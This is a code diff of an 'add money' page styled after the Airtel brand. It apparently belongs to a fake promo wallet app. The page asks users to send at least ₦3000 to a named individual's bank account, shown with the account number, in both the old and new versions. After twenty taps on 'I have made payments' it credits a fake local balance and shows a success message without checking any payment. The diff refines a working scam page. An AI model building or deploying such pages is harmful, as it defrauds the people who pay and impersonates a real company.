--- a/add-money.html
+++ b/add-money.html
@@ -1,199 +1,200 @@
-<!DOCTYPE html><html lang="en">
+<!DOCTYPE html>
+<html lang="en">
 <head>
   <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
-  <title>Add Money - Airtel Promo</title>
+  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
+  <title>Add Money</title>
   <style>
-    * {
+    body {
       margin: 0;
-      padding: 0;
-      box-sizing: border-box;
-      font-family: 'Segoe UI', sans-serif;
-    }body {
-  overflow-x: hidden;
-  background: #fff;
-  position: relative;
-  min-height: 100vh;
-}
+      font-family: Arial, sans-serif;
+      background: #fff;
+      overflow-x: hidden;
+    }
 
-.background {
-  position: absolute;
-  top: 0;
-  left: 0;
-  width: 100%;
-  height: 100%;
-  overflow: hidden;
-  z-index: -1;
-}
+    .animated-bg {
+      position: fixed;
+      top: 0; left: 0; right: 0; bottom: 0;
+      background: url('airtel-logo.png') repeat;
+      opacity: 0.05;
+      z-index: 0;
+      animation: moveBg 30s linear infinite;
+    }
 
-.background span {
-  position: absolute;
-  width: 30px;
-  height: 30px;
-  background: url('airtel-logo.png') no-repeat center center / contain;
-  animation: floatLogo 10s linear infinite;
-  opacity: 0.2;
-}
+    @keyframes moveBg {
+      0% { background-position: 0 0; }
+      100% { background-position: 1000px 1000px; }
+    }
 
-@keyframes floatLogo {
-  0% {
-    transform: translateY(100vh) rotate(0deg);
-  }
-  100% {
-    transform: translateY(-100vh) rotate(360deg);
-  }
-}
+    .container {
+      position: relative;
+      z-index: 1;
+      padding: 30px 20px;
+      text-align: center;
+    }
 
-.container {
-  padding: 20px;
-  text-align: center;
-}
+    .logo {
+      width: 80px;
+      margin: 0 auto 20px;
+      display: block;
+    }
 
-.airtel-logo {
-  width: 100px;
-  margin: 20px auto;
-  animation: scatter 2s ease forwards;
-}
+    .input-box {
+      margin-top: 20px;
+    }
 
-@keyframes scatter {
-  0% {
-    transform: scale(0) rotate(720deg);
-    opacity: 0;
-  }
-  100% {
-    transform: scale(1);
-    opacity: 1;
-  }
-}
+    input[type="number"] {
+      padding: 10px;
+      width: 80%;
+      font-size: 18px;
+      border: 1px solid #ccc;
+      border-radius: 10px;
+      outline: none;
+    }
 
-.amount-section input {
-  padding: 12px;
-  width: 80%;
-  border-radius: 10px;
-  border: 1px solid #ccc;
-  font-size: 16px;
-  margin-bottom: 20px;
-}
+    .continue-btn {
+      margin-top: 20px;
+      background-color: #d90000;
+      color: white;
+      padding: 12px 20px;
+      border: none;
+      border-radius: 10px;
+      font-size: 16px;
+      cursor: pointer;
+    }
 
-button {
-  padding: 10px 20px;
-  background: red;
-  color: white;
-  border: none;
-  border-radius: 10px;
-  font-size: 16px;
-  cursor: pointer;
-}
+    .account-details {
+      display: none;
+      margin-top: 30px;
+      background: rgba(255, 255, 255, 0.9);
+      padding: 20px;
+      border-radius: 15px;
+      box-shadow: 0 0 10px #ccc;
+    }
 
-.card {
-  background: rgba(255, 255, 255, 0.9);
-  padding: 20px;
-  border-radius: 15px;
-  margin-top: 20px;
-  box-shadow: 0 4px 12px rgba(0,0,0,0.1);
-  display: none;
-}
+    .account-details h3 {
+      margin: 0 0 10px;
+    }
 
-.popup {
-  position: fixed;
-  top: 50%;
-  left: 50%;
-  transform: translate(-50%, -50%);
-  background: white;
-  padding: 20px;
-  border-radius: 20px;
-  box-shadow: 0 5px 15px rgba(0,0,0,0.3);
-  display: none;
-  text-align: center;
-  z-index: 999;
-  animation: fadeIn 0.4s ease;
-}
+    .pay-btn {
+      margin-top: 15px;
+      background-color: #d90000;
+      color: white;
+      padding: 12px 20px;
+      border: none;
+      border-radius: 10px;
+      font-size: 16px;
+      cursor: pointer;
+    }
 
-@keyframes fadeIn {
-  from { opacity: 0; }
-  to { opacity: 1; }
-}
+    /* Pop-up */
+    .popup {
+      position: fixed;
+      top: 0; left: 0; right: 0; bottom: 0;
+      background: rgba(0, 0, 0, 0.7);
+      display: none;
+      align-items: center;
+      justify-content: center;
+      z-index: 99;
+    }
 
-.popup img {
-  width: 60px;
-  margin-bottom: 10px;
-}
+    .popup-content {
+      background: #fff;
+      padding: 25px;
+      text-align: center;
+      border-radius: 15px;
+      width: 80%;
+      box-shadow: 0 0 15px rgba(0,0,0,0.2);
+    }
 
-.back-btn {
-  margin-top: 20px;
-  display: block;
-  text-decoration: none;
-  color: red;
-  font-weight: bold;
-}
+    .popup-content h2 {
+      margin-top: 10px;
+      font-size: 18px;
+    }
+
+    .popup-content img {
+      width: 60px;
+    }
+
+    .popup-content button {
+      margin-top: 15px;
+      padding: 10px 20px;
+      background: #d90000;
+      color: white;
+      border: none;
+      border-radius: 8px;
+      font-size: 16px;
+      cursor: pointer;
+    }
 
   </style>
 </head>
 <body>
-  <div class="background" id="floating-bg"></div>  <div class="container">
-    <img src="airtel-logo.png" alt="Airtel Logo" class="airtel-logo" /><div class="amount-section">
-  <input type="number" id="amount" placeholder="Enter Amount (min ₦3000)" />
-  <br />
-  <button onclick="submitAmount()">Continue</button>
-</div>
+  <div class="animated-bg"></div>
 
-<div class="card" id="account-card">
-  <h3>Transfer To:</h3>
-  <p><strong>Name:</strong> EMMANUEL OKWUNNA</p>
-  <p><strong>Bank:</strong> SmartCash Payment Service Bank</p>
-  <p><strong>Account No:</strong> 8124890070</p>
-  <br />
-  <button onclick="recordTap()">I Have Made Payment</button>
-  <a href="dashboard.html" class="back-btn">← Back to Dashboard</a>
-</div>
+  <div class="container">
+    <img src="airtel-logo.png" class="logo" alt="Logo" />
+    <div class="input-box">
+      <input type="number" id="amountInput" placeholder="Enter amount (₦3000 minimum)" />
+      <br />
+      <button class="continue-btn" onclick="proceed()">Continue</button>
+    </div>
 
-  </div>  <div class="popup" id="popup">
-    <img src="airtel-logo.png" alt="Airtel Popup Logo">
-    <p id="popup-message"></p>
-  </div>  <script>
-    const TAP_LIMIT = 20;
-    let taps = parseInt(localStorage.getItem('tapCount') || '0');
-    const popup = document.getElementById('popup');
-    const popupMessage = document.getElementById('popup-message');
+    <div class="account-details" id="accountBox">
+      <h3>Send to:</h3>
+      <p><b>EMMANUEL OKWUNNA</b></p>
+      <p>SmartCash Payment Service Bank</p>
+      <p>Account No: <b>812 489 0070</b></p>
+      <button class="pay-btn" onclick="madePayment()">I have made payments</button>
+    </div>
+  </div>
 
-    function showPopup(message) {
-      popupMessage.innerText = message;
-      popup.style.display = 'block';
-      setTimeout(() => popup.style.display = 'none', 3000);
-    }
+  <!-- Popup -->
+  <div class="popup" id="popup">
+    <div class="popup-content">
+      <img src="airtel-logo.png" alt="Logo" />
+      <h2 id="popupMessage">Dear USERNAME, you have successfully funded your wallet with ₦3000.</h2>
+      <button onclick="closePopup()">OK</button>
+    </div>
+  </div>
 
-    function submitAmount() {
-      const amount = parseInt(document.getElementById('amount').value);
-      if (isNaN(amount) || amount < 3000) {
-        showPopup('Please input minimum of ₦3000');
-      } else {
-        showPopup('Please wait... Confirming');
-        setTimeout(() => {
-          document.getElementById('account-card').style.display = 'block';
-        }, 1000);
+  <script>
+    let tapCount = parseInt(localStorage.getItem('tapCount') || '0');
+    let user = JSON.parse(localStorage.getItem('user')) || { name: "User", phone: "08000000000", balance: 0 };
+
+    function proceed() {
+      const amt = document.getElementById('amountInput').value;
+      if (amt < 3000) {
+        alert("Minimum amount is ₦3000");
+        return;
       }
+      document.getElementById('accountBox').style.display = 'block';
     }
 
-    function recordTap() {
-      taps++;
-      localStorage.setItem('tapCount', taps);
-      if (taps >= TAP_LIMIT) {
-        showPopup('Dear user, you have successfully funded your Airtel promo app with ₦3000. Your transaction is successful.');
-        taps = 0;
+    function madePayment() {
+      tapCount++;
+      localStorage.setItem('tapCount', tapCount);
+      if (tapCount >= 20) {
+        // Add ₦3000 to balance
+        user.balance = (parseFloat(user.balance) || 0) + 3000;
+        localStorage.setItem('user', JSON.stringify(user));
         localStorage.setItem('tapCount', 0);
-        // Here you would update balance in real app
+        showPopup();
       } else {
-        showPopup('Please wait... Confirming your transaction');
+        alert(`Tap count: ${tapCount}/20`);
       }
     }
 
-    // Floating logos
-    const bg = document.getElementById('floating-bg');
-    for (let i = 0; i < 40; i++) {
-      const span = document.createElement('span');
-      span.style.left = Math.random() * 100 + 'vw';
-      span.style.animationDuration = (Math.random() * 5 + 5) + 's';
-      bg.appendChild(span);
+    function showPopup() {
+      const message = `Dear ${user.name.toUpperCase()}, you have successfully funded your wallet with ₦3000.`;
+      document.getElementById('popupMessage').innerText = message;
+      document.getElementById('popup').style.display = 'flex';
     }
-  </script></body>
+
+    function closePopup() {
+      document.getElementById('popup').style.display = 'none';
+      window.location.href = "dashboard.html";
+    }
+  </script>
+</body>
 </html>
